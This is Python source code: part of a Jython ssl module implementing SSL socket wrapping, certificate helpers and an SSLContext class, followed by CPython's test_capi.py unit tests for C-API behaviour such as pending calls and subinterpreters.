self._sock.connect_handlers.append(SSLInitializer(self.ssl_handler))
self._handshake_future = self.ssl_handler.handshakeFuture()
if isinstance(self._sock, ChildSocket):
pass
# see
# http://stackoverflow.com/questions/24628271/exception-in-netty-io-netty-util-concurrent-blockingoperationexception
# - handshake in the child thread pool
else:
self._sock._handle_channel_future(self._handshake_future, "SSL handshake")
def dup(self):
raise NotImplemented("Can't dup() %s instances" %
self.__class__.__name__)
@raises_java_exception
def _ensure_handshake(self):
log.debug("Ensure handshake", extra={"sock": self})
self._sock._make_active()
# nonblocking code should never wait here, but only attempt to
# come to this point when notified via a selector
if not hasattr(self, "_handshake_future"):
self.do_handshake()
# additional synchronization guard if this is a child socket
self._handshake_future.sync()
log.debug("Completed post connect", extra={"sock": self})
# Various pass through methods to the wrapped socket
def send(self, data):
self._ensure_handshake()
return self.sock.send(data)
write = send
def sendall(self, data):
self._ensure_handshake()
return self.sock.sendall(data)
def recv(self, bufsize, flags=0):
self._ensure_handshake()
return self.sock.recv(bufsize, flags)
def read(self, len=0, buffer=None):
"""Read up to LEN bytes and return them.
Return zero-length string on EOF."""
self._checkClosed()
self._ensure_handshake()
# FIXME? breaks test_smtpnet.py
# if not self._sslobj:
# raise ValueError("Read on closed or unwrapped SSL socket.")
try:
if buffer is not None:
v = self.recvfrom_into(buffer, len or 1024)
else:
v = self.recv(len or 1024)
return v
except SSLError as x:
if x.args[0] == SSL_ERROR_EOF and self.suppress_ragged_eofs:
if buffer is not None:
return 0
else:
return b''
else:
raise
def recvfrom(self, bufsize, flags=0):
    # Handshake first, then delegate to the wrapped socket.
    self._ensure_handshake()
    return self.sock.recvfrom(bufsize, flags)
def recvfrom_into(self, buffer, nbytes=0, flags=0):
    # Handshake first, then delegate to the wrapped socket.
    self._ensure_handshake()
    return self.sock.recvfrom_into(buffer, nbytes, flags)
def recv_into(self, buffer, nbytes=0, flags=0):
    # Handshake first, then delegate to the wrapped socket.
    self._ensure_handshake()
    return self.sock.recv_into(buffer, nbytes, flags)
def sendto(self, string, arg1, arg2=None):
    # as observed on CPython, sendto when wrapped ignores the
    # destination address, thereby behaving just like send
    self._ensure_handshake()
    return self.sock.send(string)
def close(self):
    # Delegate; no handshake needed to tear the connection down.
    self.sock.close()
def setblocking(self, mode):
    # Pass blocking mode straight through to the wrapped socket.
    self.sock.setblocking(mode)
def settimeout(self, timeout):
    # Pass the timeout straight through to the wrapped socket.
    self.sock.settimeout(timeout)
def gettimeout(self):
    # Report the wrapped socket's timeout.
    return self.sock.gettimeout()
def makefile(self, mode='r', bufsize=-1):
    # File objects created here read/write through the SSL layer.
    return self.sock.makefile(mode, bufsize)
def shutdown(self, how):
    # Delegate half/full shutdown to the wrapped socket.
    self.sock.shutdown(how)
# Need to work with the real underlying socket as well
def pending(self):
    # undocumented function, used by some tests
    # see also http://bugs.python.org/issue21430
    return self._sock._pending()
def _readable(self):
    # Selector support: readability of the underlying socket.
    return self._sock._readable()
def _writable(self):
    # Selector support: writability of the underlying socket.
    return self._sock._writable()
def _register_selector(self, selector):
    # Selector support: registration is handled by the wrapped socket.
    self._sock._register_selector(selector)
def _unregister_selector(self, selector):
    # Selector support: deregistration is handled by the wrapped socket.
    return self._sock._unregister_selector(selector)
def _notify_selectors(self):
    # Selector support: wake any selectors watching the wrapped socket.
    self._sock._notify_selectors()
def _checkClosed(self, msg=None):
    # raise an exception here if you wish to check for spurious closes
    # (deliberately a no-op at the moment).
    pass
def _check_connected(self):
    """Raise if the socket is not actually connected."""
    if not self._connected:
        # getpeername() will raise ENOTCONN if the socket is really
        # not connected; note that we can be connected even without
        # _connected being set, e.g. if connect() first returned
        # EAGAIN.
        self.getpeername()
def getpeername(self):
    # Delegate to the wrapped socket.
    return self.sock.getpeername()
def selected_npn_protocol(self):
    """Return the NPN protocol negotiated during the handshake.

    NPN is not implemented for Jython, so this always returns None.
    """
    self._checkClosed()
    # TODO Jython
    return None
def selected_alpn_protocol(self):
    """Return the ALPN protocol negotiated during the handshake.

    ALPN is not implemented for Jython, so this always returns None
    ("no protocol negotiated"), matching CPython when the feature is
    unavailable.
    """
    self._checkClosed()
    # TODO Jython: wire this up to the JSSE/Netty ALPN APIs.
    # Consistency fix: return None explicitly, matching
    # selected_npn_protocol() above (behavior is unchanged).
    return None
def fileno(self):
    # NOTE(review): returns the wrapper itself rather than an integer
    # descriptor; presumably callers (e.g. select emulation) accept
    # socket-like objects here -- confirm before changing.
    return self
@raises_java_exception
def getpeercert(self, binary_form=False):
    """Return the peer's leaf certificate.

    With ``binary_form=True`` returns the DER-encoded bytes; otherwise
    a CPython-ssl-style dict.  Returns {} when this context did not
    validate the peer (verify_mode == CERT_NONE), mirroring CPython.
    """
    # First element of the peer chain is the leaf certificate.
    cert = self.engine.getSession().getPeerCertificates()[0]
    if binary_form:
        return cert.getEncoded()
    if self._context.verify_mode == CERT_NONE:
        return {}
    dn = cert.getSubjectX500Principal().getName()
    rdns = SSLContext._parse_dn(dn)
    alt_names = tuple()
    if cert.getSubjectAlternativeNames():
        # Map Java alt-name type codes to CPython's names ("DNS", ...).
        alt_names = tuple(((_cert_name_types[type], str(name)) for (type, name) in cert.getSubjectAlternativeNames()))
    pycert = {
        "notAfter": str(_rfc2822_date_format.format(cert.getNotAfter())),
        "subject": rdns,
        "subjectAltName": alt_names,
    }
    return pycert
@raises_java_exception
def issuer(self):
    """Return the issuer DN string of the peer's leaf certificate.

    Bug fix: the previous implementation called ``getIssuerDN()`` on
    the result of ``self.getpeercert()``, which returns a Python dict
    (or DER bytes with binary_form=True), not a Java
    ``X509Certificate`` -- so it always raised AttributeError.  Fetch
    the Java certificate from the session directly, exactly as
    ``getpeercert()`` does.
    """
    cert = self.engine.getSession().getPeerCertificates()[0]
    return cert.getIssuerDN().toString()
def cipher(self):
    """Return (cipher_suite, protocol_version, secret_bits) like CPython.

    The key strength is inferred from the suite name, which is a
    heuristic (see FIXME below).
    """
    session = self.engine.getSession()
    suite = str(session.cipherSuite)
    if "256" in suite:  # FIXME!!! this test usually works, but there must be a better approach
        strength = 256
    elif "128" in suite:
        strength = 128
    else:
        strength = None
    return suite, str(session.protocol), strength
def get_channel_binding(self, cb_type="tls-unique"):
    """Get channel binding data for current connection.  Raise ValueError
    if the requested `cb_type` is not supported.  Return bytes of the data
    or None if the data is not available (e.g. before the handshake).
    """
    # Validate the request exactly like CPython, then report "no data"
    # since tls-unique extraction is not implemented here yet.
    if cb_type not in CHANNEL_BINDING_TYPES:
        raise ValueError("Unsupported channel binding type")
    if cb_type != "tls-unique":
        raise NotImplementedError(
            "{0} channel binding type not implemented"
            .format(cb_type))
    # TODO support this properly
    return None
    # if self._sslobj is None:
    #     return None
    # return self._sslobj.tls_unique_cb()
def version(self):
    """Return the negotiated protocol name, or None before the handshake."""
    if self.ssl_handler:
        return str(self.engine.getSession().getProtocol())
    return None
# instantiates a SSLEngine, with the following things to keep in mind:
# FIXME not yet supported
# suppress_ragged_eofs - presumably this is an exception we can detect in Netty, the underlying SSLEngine certainly does
# ssl_version - use SSLEngine.setEnabledProtocols(java.lang.String[])
# ciphers - SSLEngine.setEnabledCipherSuites(String[] suites)
@raises_java_exception
def wrap_socket(sock, keyfile=None, certfile=None, server_side=False, cert_reqs=CERT_NONE,
                ssl_version=PROTOCOL_SSLv23, ca_certs=None, do_handshake_on_connect=True,
                suppress_ragged_eofs=True, ciphers=None):
    """Module-level wrap_socket(), mirroring CPython's ssl API.

    NOTE(review): ``suppress_ragged_eofs`` is accepted but not forwarded
    to SSLSocket -- confirm SSLSocket's default matches, or forward it.
    """
    return SSLSocket(
        sock,
        keyfile=keyfile, certfile=certfile, cert_reqs=cert_reqs, ca_certs=ca_certs,
        server_side=server_side, ssl_version=ssl_version, ciphers=ciphers,
        do_handshake_on_connect=do_handshake_on_connect)
# some utility functions
def cert_time_to_seconds(cert_time):
    """Return the time in seconds since the Epoch, given the timestring
    representing the "notBefore" or "notAfter" date from a certificate
    in ``"%b %d %H:%M:%S %Y %Z"`` strptime format (C locale).

    "notBefore" or "notAfter" dates must use UTC (RFC 5280).

    Month is one of: Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec
    UTC should be specified as GMT (see ASN1_TIME_print())
    """
    from time import strptime
    from calendar import timegm

    month_names = (
        "Jan", "Feb", "Mar", "Apr", "May", "Jun",
        "Jul", "Aug", "Sep", "Oct", "Nov", "Dec",
    )
    # The month is resolved by hand (strptime's %b is locale dependent);
    # the remainder of the string is parsed with a fixed-GMT format.
    time_format = ' %d %H:%M:%S %Y GMT'
    month_abbrev = cert_time[:3].title()
    if month_abbrev not in month_names:
        raise ValueError('time data %r does not match '
                         'format "%%b%s"' % (cert_time, time_format))
    month_number = month_names.index(month_abbrev) + 1
    parsed = strptime(cert_time[3:], time_format)
    # Rebuild the struct_time tuple with our month and convert via
    # timegm(); the result is an integer (fractional seconds are 0).
    return timegm((parsed[0], month_number) + parsed[2:6])
# PEM framing lines used by the DER<->PEM conversion helpers below.
PEM_HEADER = "-----BEGIN CERTIFICATE-----"
PEM_FOOTER = "-----END CERTIFICATE-----"
def DER_cert_to_PEM_cert(der_cert_bytes):
    """Takes a certificate in binary DER format and returns the
    PEM version of it as a string."""
    # NOTE: Python-2-era code path; base64.encodestring and passing the
    # encoded result to textwrap.fill both assume str, not bytes.
    if hasattr(base64, 'standard_b64encode'):
        # preferred because older API gets line-length wrong
        f = base64.standard_b64encode(der_cert_bytes)
        return (PEM_HEADER + '\n' +
                textwrap.fill(f, 64) + '\n' +
                PEM_FOOTER + '\n')
    else:
        return (PEM_HEADER + '\n' +
                base64.encodestring(der_cert_bytes) +
                PEM_FOOTER + '\n')
def PEM_cert_to_DER_cert(pem_cert_string):
    """Takes a certificate in ASCII PEM format and returns the
    DER-encoded version of it as a byte sequence"""
    if not pem_cert_string.startswith(PEM_HEADER):
        raise ValueError("Invalid PEM encoding; must start with %s"
                         % PEM_HEADER)
    if not pem_cert_string.strip().endswith(PEM_FOOTER):
        raise ValueError("Invalid PEM encoding; must end with %s"
                         % PEM_FOOTER)
    # Strip the framing lines and decode the base64 body.
    # NOTE: base64.decodestring is a Python-2 API (removed in 3.9).
    d = pem_cert_string.strip()[len(PEM_HEADER):-len(PEM_FOOTER)]
    return base64.decodestring(d)
def get_server_certificate(addr, ssl_version=PROTOCOL_SSLv3, ca_certs=None):
    """Retrieve the certificate from the server at the specified address,
    and return it as a PEM-encoded string.
    If 'ca_certs' is specified, validate the server cert against it.
    If 'ssl_version' is specified, use it in the connection attempt."""
    host, port = addr  # validates the (host, port) shape up front
    # Only require validation when trust anchors were supplied.
    cert_reqs = CERT_REQUIRED if ca_certs is not None else CERT_NONE
    conn = wrap_socket(socket(), ssl_version=ssl_version,
                       cert_reqs=cert_reqs, ca_certs=ca_certs)
    conn.connect(addr)
    der_encoded = conn.getpeercert(True)
    conn.close()
    return DER_cert_to_PEM_cert(der_encoded)
def get_protocol_name(protocol_code):
    # Map a PROTOCOL_* constant to its display name; '<unknown>' for
    # unrecognised codes, mirroring CPython.
    return _PROTOCOL_NAMES.get(protocol_code, '<unknown>')
# a replacement for the old socket.ssl function
def sslwrap_simple(sock, keyfile=None, certfile=None):
    """A replacement for the old socket.ssl function.  Designed
    for compability with Python 2.5 and earlier.  Will disappear in
    Python 3.0."""
    ssl_sock = wrap_socket(sock, keyfile=keyfile, certfile=certfile, ssl_version=PROTOCOL_SSLv23)
    # Handshake immediately only if the socket is already connected;
    # getpeername() raising means connect() has not happened yet.
    try:
        sock.getpeername()
    except socket_error:
        # no, no connection yet
        pass
    else:
        # yes, do the handshake
        ssl_sock.do_handshake()
    return ssl_sock
# Underlying Java does a good job of managing entropy, so these are just no-ops
def RAND_status():
    """Always report the PRNG as seeded; the JVM manages entropy itself."""
    return True
def RAND_egd(path):
    """Accept (and ignore) an EGD socket path; the JVM manages entropy.

    Mirrors CPython's argument checking just enough to reject
    non-absolute paths.
    """
    normalized = os.path.abspath(str(path))
    if normalized != path:
        raise TypeError("Must be an absolute path, but ignoring it regardless")
def RAND_add(bytes, entropy):
    """No-op: entropy mixing is left entirely to the JVM."""
    return None
class SSLContext(object):
    """Jython analogue of CPython's ssl.SSLContext.

    Wraps a pair of in-memory Java KeyStores (one for trust anchors,
    one for the key/certificate chain) and builds Netty/JSSE SSLEngine
    instances from them on demand.
    """

    # JSSE key types probed when building key managers.
    _jsse_keyType_names = ('RSA', 'DSA', 'DH_RSA', 'DH_DSA', 'EC', 'EC_EC', 'EC_RSA')

    def __init__(self, protocol):
        try:
            self._protocol_name = _PROTOCOL_NAMES[protocol]
        except KeyError:
            raise ValueError("invalid protocol version")
        if protocol == PROTOCOL_SSLv23:  # darjus: at least my Java does not let me use v2
            self._protocol_name = 'SSL'
        self.protocol = protocol
        self._check_hostname = False
        # defaults from _ssl.c
        self.options = OP_ALL | OP_NO_SSLv2 | OP_NO_SSLv3
        self._verify_flags = VERIFY_DEFAULT
        self._verify_mode = CERT_NONE
        self._ciphers = None
        # Empty in-memory keystores, populated later by
        # load_verify_locations() / load_cert_chain().
        self._trust_store = KeyStore.getInstance(KeyStore.getDefaultType())
        self._trust_store.load(None, None)
        self._key_store = KeyStore.getInstance(KeyStore.getDefaultType())
        self._key_store.load(None, None)
        self._key_managers = None
        self._server_name_callback = None

    def wrap_socket(self, sock, server_side=False,
                    do_handshake_on_connect=True,
                    suppress_ragged_eofs=True,
                    server_hostname=None):
        """Wrap an existing socket in an SSLSocket bound to this context."""
        return SSLSocket(sock=sock, server_side=server_side,
                         do_handshake_on_connect=do_handshake_on_connect,
                         suppress_ragged_eofs=suppress_ragged_eofs,
                         server_hostname=server_hostname,
                         _context=self)

    def _createSSLEngine(self, addr, hostname=None, cert_file=None, key_file=None, server_side=False):
        """Build a JSSE SSLEngine for one connection to/from *addr*.

        Trust/key managers come from this context's stores; hostname
        verification and SNI are enabled when check_hostname is set.
        """
        tmf = InsecureTrustManagerFactory.INSTANCE
        if self.verify_mode != CERT_NONE:
            # XXX need to refactor so we don't have to get trust managers twice
            stmf = SimpleTrustManagerFactory.getInstance(SimpleTrustManagerFactory.getDefaultAlgorithm())
            stmf.init(self._trust_store)
            tmf = CompositeX509TrustManagerFactory(stmf.getTrustManagers())
            tmf.init(self._trust_store)
        kmf = self._key_managers
        if self._key_managers is None:
            kmf = _get_openssl_key_manager(cert_file=cert_file, key_file=key_file)
        context_builder = None
        if not server_side:
            context_builder = SslContextBuilder.forClient()
        if kmf:
            if server_side:
                context_builder = SslContextBuilder.forServer(kmf)
            else:
                context_builder = context_builder.keyManager(kmf)
        context_builder = context_builder.trustManager(tmf)
        context_builder = context_builder.sslProvider(SslProvider.JDK)
        context_builder = context_builder.clientAuth(_CERT_TO_CLIENT_AUTH[self.verify_mode])
        if self._ciphers is not None:
            context_builder = context_builder.ciphers(self._ciphers)
        if self._check_hostname:
            # HTTPS-style endpoint identification, plus SNI when the
            # runtime supports it.
            engine = context_builder.build().newEngine(ByteBufAllocator.DEFAULT, hostname, addr[1])
            if HAS_SNI:
                params = engine.getSSLParameters()
                params.setEndpointIdentificationAlgorithm('HTTPS')
                params.setServerNames([SNIHostName(hostname)])
                engine.setSSLParameters(params)
        else:
            engine = context_builder.build().newEngine(ByteBufAllocator.DEFAULT, addr[0], addr[1])
        return engine

    def cert_store_stats(self):
        """Return counts of loaded certs, shaped like CPython's dict."""
        return {'crl': 0, 'x509': self._key_store.size(), 'x509_ca': self._trust_store.size()}

    def load_cert_chain(self, certfile, keyfile=None, password=None):
        """Load a certificate chain and private key, like CPython."""
        try:
            self._key_managers = _get_openssl_key_manager(certfile, keyfile, password, _key_store=self._key_store)
        except IllegalArgumentException as err:
            raise SSLError(SSL_ERROR_SSL, "PEM lib ({})".format(err))

    def set_ciphers(self, ciphers):
        # TODO conversion from OpenSSL to http://www.iana.org/assignments/tls-parameters/tls-parameters.xml
        # as Java knows no other
        #self._ciphers = ciphers
        pass

    def load_verify_locations(self, cafile=None, capath=None, cadata=None):
        """Load CA certificates from a file, directory and/or raw data."""
        if cafile is None and capath is None and cadata is None:
            raise TypeError("cafile, capath and cadata cannot be all omitted")
        cafiles = []
        if cafile is not None:
            cafiles.append(cafile)
        if capath is not None:
            for fname in os.listdir(capath):
                _, ext = os.path.splitext(fname)
                possible_cafile = os.path.join(capath, fname)
                # Bug fix: os.path.splitext keeps the leading dot, so the
                # original comparison (ext.lower() == 'pem') could never
                # match and *.pem files in capath were silently skipped.
                if ext.lower() == '.pem':
                    cafiles.append(possible_cafile)
                elif fname == 'cacerts':  # java truststore
                    if os.path.isfile(possible_cafile):
                        cafiles.append(possible_cafile)
                elif os.path.isfile(possible_cafile):
                    try:
                        with open(possible_cafile) as f:
                            if PEM_HEADER in f.read():
                                cafiles.append(possible_cafile)
                    except IOError:
                        log.debug("Not including %s file as a possible cafile due to permissions error" % possible_cafile)
                        pass  # Probably permissions related...ignore
        certs = []
        private_key = None
        if cadata is not None:
            certs, private_key = _extract_cert_from_data(cadata)
        # NOTE(review): a private_key extracted from cadata above is
        # overwritten by the path-based extraction here -- confirm
        # whether that is intended.
        _certs, private_key = _extract_certs_for_paths(cafiles)
        certs.extend(_certs)
        for cert in certs:
            # FIXME not sure this is correct?
            if private_key is None:
                self._trust_store.setCertificateEntry(_str_hash_key_entry(cert), cert)
            else:
                self._key_store.setCertificateEntry(_str_hash_key_entry(cert), cert)

    def load_default_certs(self, purpose=Purpose.SERVER_AUTH):
        # TODO handle/support purpose
        if not isinstance(purpose, _ASN1Object):
            raise TypeError(purpose)
        self.set_default_verify_paths()

    def set_default_verify_paths(self):
        """
        Load a set of default "certification authority" (CA) certificates from a filesystem path defined when building
        the OpenSSL library. Unfortunately, there's no easy way to know whether this method succeeds: no error is
        returned if no certificates are to be found. When the OpenSSL library is provided as part of the operating
        system, though, it is likely to be configured properly.
        """
        default_verify_paths = get_default_verify_paths()
        self.load_verify_locations(cafile=default_verify_paths.cafile, capath=default_verify_paths.capath)

    def set_alpn_protocols(self, protocols):
        # ALPN is not supported on this backend.
        raise NotImplementedError()

    def set_npn_protocols(self, protocols):
        # NPN is not supported on this backend.
        raise NotImplementedError()

    def set_servername_callback(self, server_name_callback):
        """Register an SNI callback (None clears it), like CPython."""
        if not callable(server_name_callback) and server_name_callback is not None:
            raise TypeError("{!r} is not callable".format(server_name_callback))
        self._server_name_callback = server_name_callback

    def load_dh_params(self, dhfile):
        # TODO?
        pass

    def set_ecdh_curve(self, curve_name):
        # NOTE(review): the resulting spec is unused; presumably this only
        # validates curve_name via the helper -- confirm.
        params = _get_ecdh_parameter_spec(curve_name)

    def session_stats(self):
        # TODO: no session statistics are collected yet; report zeros in
        # CPython's dict shape.
        return {
            'number': 0,
            'connect': 0,
            'connect_good': 0,
            'connect_renegotiate': 0,
            'accept': 0,
            'accept_good': 0,
            'accept_renegotiate': 0,
            'hits': 0,
            'misses': 0,
            'timeouts': 0,
            'cache_full': 0,
        }

    def get_ca_certs(self, binary_form=False):
        """get_ca_certs(binary_form=False) -> list of loaded certificate

        Returns a list of dicts with information of loaded CA certs. If the optional argument is True,
        returns a DER-encoded copy of the CA certificate.
        NOTE: Certificates in a capath directory aren't loaded unless they have been used at least once.
        """
        certs = []
        for alias in self._trust_store.aliases():
            if self._trust_store.isCertificateEntry(alias):
                cert = self._trust_store.getCertificate(alias)
                if binary_form:
                    certs.append(cert.getEncoded().tostring())
                else:
                    issuer_info = self._parse_dn(cert.issuerDN)
                    subject_info = self._parse_dn(cert.subjectDN)
                    cert_info = {'issuer': issuer_info, 'subject': subject_info}
                    for k in ('serialNumber', 'version'):
                        cert_info[k] = getattr(cert, k)
                    for k in ('notBefore', 'notAfter'):
                        cert_info[k] = str(_rfc2822_date_format.format(getattr(cert, k)))
                    certs.append(cert_info)
        return certs

    @property
    def check_hostname(self):
        return self._check_hostname

    @check_hostname.setter
    def check_hostname(self, val):
        if val and self.verify_mode == CERT_NONE:
            raise ValueError("check_hostname needs a SSL context with either "
                             "CERT_OPTIONAL or CERT_REQUIRED")
        self._check_hostname = val

    @property
    def verify_mode(self):
        return self._verify_mode

    @verify_mode.setter
    def verify_mode(self, val):
        # (typo "verfy_mode" in the original error messages fixed)
        if not isinstance(val, int):
            raise TypeError("verify_mode must be one of the ssl.CERT_* modes")
        if val not in (CERT_NONE, CERT_OPTIONAL, CERT_REQUIRED):
            raise ValueError("verify_mode must be one of the ssl.CERT_* modes")
        if self.check_hostname and val == CERT_NONE:
            raise ValueError("Cannot set verify_mode to CERT_NONE when "
                             "check_hostname is enabled.")
        self._verify_mode = val

    @property
    def verify_flags(self):
        return self._verify_flags

    @verify_flags.setter
    def verify_flags(self, val):
        # (typo "verfy_flags" in the original error message fixed)
        if not isinstance(val, int):
            raise TypeError("verify_flags must be one of the ssl.VERIFY_* flags")
        self._verify_flags = val

    @classmethod
    def _parse_dn(cls, dn):
        """Parse a distinguished name into CPython's nested-tuple form."""
        ln = LdapName(unicode(dn))
        # FIXME given this tuple of a single element tuple structure assumed here, is it possible this is
        # not actually the case, eg because of multi value attributes?
        return tuple((((_ldap_rdn_display_names.get(rdn.type), _str_or_unicode(rdn.value)),) for rdn in ln.getRdns()))
| gpl-3.0 |
goldeneye-source/ges-python | lib/test/test_capi.py | 80 | 18444 | # Run the _testcapi module tests (tests for the Python/C API): by defn,
# these are all functions _testcapi exports whose name begins with 'test_'.
import os
import pickle
import random
import subprocess
import sys
import time
import unittest
from test import support
from test.support import MISSING_C_DOCSTRINGS
try:
import _posixsubprocess
except ImportError:
_posixsubprocess = None
try:
import threading
except ImportError:
threading = None
# Skip this test if the _testcapi module isn't available.
_testcapi = support.import_module('_testcapi')
def testfunction(self):
    """some doc"""
    # NOTE: the docstring text and identity of this function are asserted
    # by CAPITest.test_instancemethod; do not edit the docstring.
    return self
class InstanceMethod:
    # Wrap plain callables with the C-level instancemethod descriptor so
    # attribute access through instances exercises that code path.
    id = _testcapi.instancemethod(id)
    testfunction = _testcapi.instancemethod(testfunction)
class CAPITest(unittest.TestCase):
    """Assorted checks driven by the _testcapi C extension."""

    def test_instancemethod(self):
        inst = InstanceMethod()
        self.assertEqual(id(inst), inst.id())
        self.assertTrue(inst.testfunction() is inst)
        self.assertEqual(inst.testfunction.__doc__, testfunction.__doc__)
        self.assertEqual(InstanceMethod.testfunction.__doc__, testfunction.__doc__)

        # Attribute writes go through to the wrapped function; writes via
        # the bound form must be rejected.
        InstanceMethod.testfunction.attribute = "test"
        self.assertEqual(testfunction.attribute, "test")
        self.assertRaises(AttributeError, setattr, inst.testfunction, "attribute", "test")

    @unittest.skipUnless(threading, 'Threading required for this test.')
    def test_no_FatalError_infinite_loop(self):
        # Crash the interpreter in a subprocess and check that the fatal
        # error is reported instead of looping forever.
        with support.SuppressCrashReport():
            p = subprocess.Popen([sys.executable, "-c",
                                  'import _testcapi;'
                                  '_testcapi.crash_no_current_thread()'],
                                 stdout=subprocess.PIPE,
                                 stderr=subprocess.PIPE)
        (out, err) = p.communicate()
        self.assertEqual(out, b'')
        # This used to cause an infinite loop.
        self.assertTrue(err.rstrip().startswith(
                        b'Fatal Python error:'
                        b' PyThreadState_Get: no current thread'))

    def test_memoryview_from_NULL_pointer(self):
        self.assertRaises(ValueError, _testcapi.make_memoryview_from_NULL_pointer)

    def test_exc_info(self):
        # set_exc_info() must swap the thread's exception state and return
        # the previous one, and restoring must round-trip exactly.
        raised_exception = ValueError("5")
        new_exc = TypeError("TEST")
        try:
            raise raised_exception
        except ValueError as e:
            tb = e.__traceback__
            orig_sys_exc_info = sys.exc_info()
            orig_exc_info = _testcapi.set_exc_info(new_exc.__class__, new_exc, None)
            new_sys_exc_info = sys.exc_info()
            new_exc_info = _testcapi.set_exc_info(*orig_exc_info)
            reset_sys_exc_info = sys.exc_info()

            self.assertEqual(orig_exc_info[1], e)

            self.assertSequenceEqual(orig_exc_info, (raised_exception.__class__, raised_exception, tb))
            self.assertSequenceEqual(orig_sys_exc_info, orig_exc_info)
            self.assertSequenceEqual(reset_sys_exc_info, orig_exc_info)
            self.assertSequenceEqual(new_exc_info, (new_exc.__class__, new_exc, None))
            self.assertSequenceEqual(new_sys_exc_info, new_exc_info)
        else:
            # The raise above must always be taken.
            self.assertTrue(False)

    @unittest.skipUnless(_posixsubprocess, '_posixsubprocess required for this test.')
    def test_seq_bytes_to_charp_array(self):
        # Issue #15732: crash in _PySequence_BytesToCharpArray()
        class Z(object):
            def __len__(self):
                return 1
        self.assertRaises(TypeError, _posixsubprocess.fork_exec,
                          1, Z(), 3, [1, 2], 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17)
        # Issue #15736: overflow in _PySequence_BytesToCharpArray()
        class Z(object):
            def __len__(self):
                return sys.maxsize
            def __getitem__(self, i):
                return b'x'
        self.assertRaises(MemoryError, _posixsubprocess.fork_exec,
                          1, Z(), 3, [1, 2], 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17)

    @unittest.skipUnless(_posixsubprocess, '_posixsubprocess required for this test.')
    def test_subprocess_fork_exec(self):
        class Z(object):
            def __len__(self):
                return 1

        # Issue #15738: crash in subprocess_fork_exec()
        self.assertRaises(TypeError, _posixsubprocess.fork_exec,
                          Z(), [b'1'], 3, [1, 2], 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17)

    @unittest.skipIf(MISSING_C_DOCSTRINGS,
                     "Signature information for builtins requires docstrings")
    def test_docstring_signature_parsing(self):
        # Each fixture in _testcapi pins one branch of the C-level
        # "signature embedded in docstring" parser.
        self.assertEqual(_testcapi.no_docstring.__doc__, None)
        self.assertEqual(_testcapi.no_docstring.__text_signature__, None)

        self.assertEqual(_testcapi.docstring_empty.__doc__, "")
        self.assertEqual(_testcapi.docstring_empty.__text_signature__, None)

        self.assertEqual(_testcapi.docstring_no_signature.__doc__,
                         "This docstring has no signature.")
        self.assertEqual(_testcapi.docstring_no_signature.__text_signature__, None)

        self.assertEqual(_testcapi.docstring_with_invalid_signature.__doc__,
                         "docstring_with_invalid_signature($module, /, boo)\n"
                         "\n"
                         "This docstring has an invalid signature."
                         )
        self.assertEqual(_testcapi.docstring_with_invalid_signature.__text_signature__, None)

        self.assertEqual(_testcapi.docstring_with_invalid_signature2.__doc__,
                         "docstring_with_invalid_signature2($module, /, boo)\n"
                         "\n"
                         "--\n"
                         "\n"
                         "This docstring also has an invalid signature."
                         )
        self.assertEqual(_testcapi.docstring_with_invalid_signature2.__text_signature__, None)

        self.assertEqual(_testcapi.docstring_with_signature.__doc__,
                         "This docstring has a valid signature.")
        self.assertEqual(_testcapi.docstring_with_signature.__text_signature__, "($module, /, sig)")

        self.assertEqual(_testcapi.docstring_with_signature_and_extra_newlines.__doc__,
                         "\nThis docstring has a valid signature and some extra newlines.")
        self.assertEqual(_testcapi.docstring_with_signature_and_extra_newlines.__text_signature__,
                         "($module, /, parameter)")
@unittest.skipUnless(threading, 'Threading required for this test.')
class TestPendingCalls(unittest.TestCase):
    """Exercise Py_AddPendingCall via _testcapi._pending_threadfunc."""

    def pendingcalls_submit(self, l, n):
        def callback():
            #this function can be interrupted by thread switching so let's
            #use an atomic operation
            l.append(None)

        for i in range(n):
            time.sleep(random.random()*0.02) #0.01 secs on average
            #try submitting callback until successful.
            #rely on regular interrupt to flush queue if we are
            #unsuccessful.
            while True:
                if _testcapi._pending_threadfunc(callback):
                    break;

    def pendingcalls_wait(self, l, n, context = None):
        #now, stick around until l[0] has grown to 10
        count = 0;
        while len(l) != n:
            #this busy loop is where we expect to be interrupted to
            #run our callbacks.  Note that callbacks are only run on the
            #main thread
            if False and support.verbose:
                print("(%i)"%(len(l),),)
            for i in range(1000):
                a = i*i
            if context and not context.event.is_set():
                continue
            count += 1
            self.assertTrue(count < 10000,
                "timeout waiting for %i callbacks, got %i"%(n, len(l)))
        if False and support.verbose:
            print("(%i)"%(len(l),))

    def test_pendingcalls_threaded(self):
        #do every callback on a separate thread
        n = 32 #total callbacks
        threads = []
        class foo(object):pass
        context = foo()
        context.l = []
        context.n = 2 #submits per thread
        context.nThreads = n // context.n
        context.nFinished = 0
        context.lock = threading.Lock()
        context.event = threading.Event()

        for i in range(context.nThreads):
            t = threading.Thread(target=self.pendingcalls_thread, args = (context,))
            t.start()
            threads.append(t)

        self.pendingcalls_wait(context.l, n, context)

        for t in threads:
            t.join()

    def pendingcalls_thread(self, context):
        try:
            self.pendingcalls_submit(context.l, context.n)
        finally:
            with context.lock:
                context.nFinished += 1
                nFinished = context.nFinished
                if False and support.verbose:
                    print("finished threads: ", nFinished)
            if nFinished == context.nThreads:
                context.event.set()

    def test_pendingcalls_non_threaded(self):
        #again, just using the main thread, likely they will all be dispatched at
        #once.  It is ok to ask for too many, because we loop until we find a slot.
        #the loop can be interrupted to dispatch.
        #there are only 32 dispatch slots, so we go for twice that!
        l = []
        n = 64
        self.pendingcalls_submit(l, n)
        self.pendingcalls_wait(l, n)
class SubinterpreterTest(unittest.TestCase):
    """Subinterpreters must get their own sys.modules and builtins."""

    def test_subinterps(self):
        import builtins
        r, w = os.pipe()
        # The subinterpreter reports the object ids of its module state
        # through the pipe; they must differ from ours.
        code = """if 1:
            import sys, builtins, pickle
            with open({:d}, "wb") as f:
                pickle.dump(id(sys.modules), f)
                pickle.dump(id(builtins), f)
            """.format(w)
        with open(r, "rb") as f:
            ret = support.run_in_subinterp(code)
            self.assertEqual(ret, 0)
            self.assertNotEqual(pickle.load(f), id(sys.modules))
            self.assertNotEqual(pickle.load(f), id(builtins))
# Bug #6012
class Test6012(unittest.TestCase):
    # Regression test for bug #6012 (argument parsing in the C API).
    def test(self):
        self.assertEqual(_testcapi.argparsing("Hello", "World"), 1)
